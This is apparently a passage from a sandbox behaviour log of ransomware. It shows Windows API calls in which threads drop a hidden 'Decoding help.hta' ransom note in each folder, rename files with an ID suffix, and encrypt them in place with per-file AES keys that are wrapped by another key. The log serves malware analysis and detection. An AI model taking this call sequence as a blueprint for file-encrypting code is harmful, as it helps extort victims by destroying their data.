Final=0, dwFlags=0x0, pbData=0x3990000, pdwDataLen=0x8f4fce4*=0x19780, dwBufLen=0x19780) Thread: id = 577 os_tid = 0xd48 [0045.636] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*", lpFindFileData=0x4d8fd30 | out: lpFindFileData=0x4d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1de59710, ftCreationTime.dwHighDateTime=0x1d4c686, ftLastAccessTime.dwLowDateTime=0x15ae4b10, ftLastAccessTime.dwHighDateTime=0x1d4d1ca, ftLastWriteTime.dwLowDateTime=0x15ae4b10, ftLastWriteTime.dwHighDateTime=0x1d4d1ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2970 [0045.636] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.636] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x4d8fd30 | out: lpFindFileData=0x4d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1de59710, ftCreationTime.dwHighDateTime=0x1d4c686, ftLastAccessTime.dwLowDateTime=0x15ae4b10, ftLastAccessTime.dwHighDateTime=0x1d4d1ca, ftLastWriteTime.dwLowDateTime=0x15ae4b10, ftLastWriteTime.dwHighDateTime=0x1d4d1ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.636] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.636] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.636] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x4d8fd30 | out: lpFindFileData=0x4d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29619e0, ftCreationTime.dwHighDateTime=0x1d4cae5, ftLastAccessTime.dwLowDateTime=0xf8d3c590, ftLastAccessTime.dwHighDateTime=0x1d4c618, ftLastWriteTime.dwLowDateTime=0xf8d3c590, ftLastWriteTime.dwHighDateTime=0x1d4c618, nFileSizeHigh=0x0, nFileSizeLow=0xcf3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="c-JKdua8N5.ots", cAlternateFileName="C-JKDU~1.OTS")) returned 1 [0045.636] lstrcpyW (in: lpString1=0x5e90c18, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" [0045.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned 63 [0045.645] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\Decoding help.hta" [0045.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\decoding help.hta")) returned 0xffffffff [0045.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624 [0045.683] WriteFile (in: hFile=0x624, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4d8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4d8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.684] CloseHandle (hObject=0x624) returned 1 [0045.685] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.891] lstrcmpiW (lpString1="Decoding help.hta", lpString2="c-JKdua8N5.ots") returned 1 [0048.891] lstrlenW (lpString="c-JKdua8N5.ots") returned 14 [0048.891] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" [0048.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned 63 [0048.891] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\", lpString2="c-JKdua8N5.ots" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots" [0048.891] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots" [0048.891] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots.[ID]g9uZrLhJaygpwRm1[ID]" [0048.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\c-jkdua8n5.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\c-jkdua8n5.ots.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0048.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\c-jkdua8n5.ots.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x710 [0048.892] CreateFileMappingA (hFile=0x710, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x664 [0048.892] CryptAcquireContextA (in: phProv=0x4d8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x4d8fcec*=0x3448fa0) returned 1 [0048.893] CryptGenKey (in: hProv=0x3448fa0, Algid=0x6610, dwFlags=0x1, phKey=0x4d8fce8 | out: phKey=0x4d8fce8*=0x5e30b0) returned 1 [0048.893] CryptExportKey (in: hKey=0x5e30b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x4d8fbe4, pdwDataLen=0x4d8fce4 | out: pbData=0x4d8fbe4*, pdwDataLen=0x4d8fce4*=0x2c) returned 1 [0048.893] MapViewOfFile (hFileMappingObject=0x664, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcf20) returned 0x2d0000 [0048.895] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8fbe4*, pdwDataLen=0x4d8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x4d8fbe4*, pdwDataLen=0x4d8fcf8*=0x100) returned 1 [0048.895] CryptEncrypt (in: hKey=0x5e30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x4d8fce4*=0xcf20, dwBufLen=0xcf20 | out: pbData=0x2d0000*, pdwDataLen=0x4d8fce4*=0xcf20) returned 1 [0048.896] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0048.897] CloseHandle (hObject=0x664) returned 1 [0048.898] CryptDestroyKey (hKey=0x5e30b0) returned 1 [0048.898] CryptReleaseContext (hProv=0x3448fa0, dwFlags=0x0) returned 1 [0048.898] SetFilePointerEx (in: hFile=0x710, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.898] WriteFile (in: hFile=0x710, lpBuffer=0x4d8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x4d8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4d8fbe4*, lpNumberOfBytesWritten=0x4d8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.871] WriteFile (in: hFile=0x710, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x4d8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x4d8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0049.871] CloseHandle (hObject=0x710) returned 1 [0049.873] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c-JKdua8N5.ots.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.927] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x4d8fd30 | out: lpFindFileData=0x4d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68cb40e0, ftCreationTime.dwHighDateTime=0x1d4d55e, ftLastAccessTime.dwLowDateTime=0xb5bdd0e0, ftLastAccessTime.dwHighDateTime=0x1d4c98b, ftLastWriteTime.dwLowDateTime=0xb5bdd0e0, ftLastWriteTime.dwHighDateTime=0x1d4c98b, nFileSizeHigh=0x0, nFileSizeLow=0x1717b, dwReserved0=0x0, dwReserved1=0x0, cFileName="c1VKiuv.odp", cAlternateFileName="")) returned 1 [0050.927] lstrcpyW (in: lpString1=0x25398268, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" [0050.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned 63 [0050.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\Decoding help.hta" [0050.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\decoding help.hta")) returned 0x1 [0050.927] lstrcmpiW (lpString1="Decoding help.hta", lpString2="c1VKiuv.odp") returned 1 [0050.927] lstrlenW (lpString="c1VKiuv.odp") returned 11 [0050.927] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" [0050.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned 63 [0050.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\", lpString2="c1VKiuv.odp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp" [0050.927] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp" [0050.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp.[ID]g9uZrLhJaygpwRm1[ID]" [0050.927] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\c1vkiuv.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\c1vkiuv.odp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dbfmox0dnunpsie\\c1vkiuv.odp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x740 [0052.057] CreateFileMappingA (hFile=0x740, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x198 [0052.057] CryptAcquireContextA (in: phProv=0x4d8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x4d8fcec*=0x3449e80) returned 1 [0054.901] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x4d8fce8 | out: phKey=0x4d8fce8*=0x5d8b10) returned 1 [0054.901] CryptExportKey (in: hKey=0x5d8b10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x4d8fbe4, pdwDataLen=0x4d8fce4 | out: pbData=0x4d8fbe4*, pdwDataLen=0x4d8fce4*=0x2c) returned 1 [0054.901] MapViewOfFile (hFileMappingObject=0x198, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17160) returned 0x550000 [0054.903] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8fbe4*, pdwDataLen=0x4d8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x4d8fbe4*, pdwDataLen=0x4d8fcf8*=0x100) returned 1 [0054.903] CryptEncrypt (in: hKey=0x5d8b10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x4d8fce4*=0x17160, dwBufLen=0x17160 | out: pbData=0x550000*, pdwDataLen=0x4d8fce4*=0x17160) returned 1 [0054.905] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0054.907] CloseHandle (hObject=0x198) returned 1 [0054.907] CryptDestroyKey (hKey=0x5d8b10) returned 1 [0054.907] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0054.907] SetFilePointerEx (in: hFile=0x740, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.907] WriteFile (in: hFile=0x740, lpBuffer=0x4d8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x4d8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4d8fbe4*, lpNumberOfBytesWritten=0x4d8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.948] WriteFile (in: hFile=0x740, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x4d8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x4d8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.948] CloseHandle (hObject=0x740) returned 1 [0056.948] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\c1VKiuv.odp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.493] FindNextFileW (in: hFindFile=0x5e2970, lpFindFileData=0x4d8fd30 | out: lpFindFileData=0x4d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68cb40e0, ftCreationTime.dwHighDateTime=0x1d4d55e, ftLastAccessTime.dwLowDateTime=0xb5bdd0e0, ftLastAccessTime.dwHighDateTime=0x1d4c98b, ftLastWriteTime.dwLowDateTime=0xb5bdd0e0, ftLastWriteTime.dwHighDateTime=0x1d4c98b, nFileSizeHigh=0x0, nFileSizeLow=0x1717b, dwReserved0=0x0, dwReserved1=0x0, cFileName="c1VKiuv.odp", cAlternateFileName="")) returned 0 [0058.493] FindClose (in: hFindFile=0x5e2970 | out: hFindFile=0x5e2970) returned 1 Thread: id = 578 os_tid = 0xd4c [0045.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*", lpFindFileData=0x590fd30 | out: lpFindFileData=0x590fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e46d20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xa3e46d20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa3e46d20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3670 [0045.649] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.649] FindNextFileW (in: hFindFile=0x5e3670, lpFindFileData=0x590fd30 | out: lpFindFileData=0x590fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e46d20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xa3e46d20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa3e46d20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.873] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.873] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.873] FindNextFileW (in: hFindFile=0x5e3670, lpFindFileData=0x590fd30 | out: lpFindFileData=0x590fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c444100, ftCreationTime.dwHighDateTime=0x1cc114e, ftLastAccessTime.dwLowDateTime=0xa3e6ce80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x5c444100, ftLastWriteTime.dwHighDateTime=0x1cc114e, nFileSizeHigh=0x0, nFileSizeLow=0xdf600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdia80.dll", cAlternateFileName="")) returned 1 [0045.873] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*" [0045.873] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*") returned 69 [0045.873] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\Decoding help.hta" [0045.873] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\decoding help.hta")) returned 0xffffffff [0045.873] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0045.873] WriteFile (in: hFile=0x3c0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x590fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x590fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.874] CloseHandle (hObject=0x3c0) returned 1 [0045.874] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0045.875] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdia80.dll") returned -1 [0045.875] lstrlenW (lpString="msdia80.dll") returned 11 [0045.875] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*" [0045.875] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\*.*") returned 69 [0045.875] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\", lpString2="msdia80.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll" [0045.875] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll" [0045.875] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0045.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0045.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x770 [0045.967] CreateFileMappingA (hFile=0x770, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x378 [0045.967] CryptAcquireContextA (in: phProv=0x590fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x590fcec*=0x3449f08) returned 1 [0045.968] CryptGenKey (in: hProv=0x3449f08, Algid=0x6610, dwFlags=0x1, phKey=0x590fce8 | out: phKey=0x590fce8*=0x5db6b8) returned 1 [0045.968] CryptExportKey (in: hKey=0x5db6b8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x590fbe4, pdwDataLen=0x590fce4 | out: pbData=0x590fbe4*, pdwDataLen=0x590fce4*=0x2c) returned 1 [0045.968] MapViewOfFile (hFileMappingObject=0x378, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf600) returned 0x2ff0000 [0046.102] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x590fbe4*, pdwDataLen=0x590fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x590fbe4*, pdwDataLen=0x590fcf8*=0x100) returned 1 [0046.112] CryptEncrypt (in: hKey=0x5db6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ff0000, pdwDataLen=0x590fce4*=0xdf600, dwBufLen=0xdf600 | out: pbData=0x2ff0000*, pdwDataLen=0x590fce4*=0xdf600) returned 1 [0047.185] UnmapViewOfFile (lpBaseAddress=0x2ff0000) returned 1 [0047.195] CloseHandle (hObject=0x378) returned 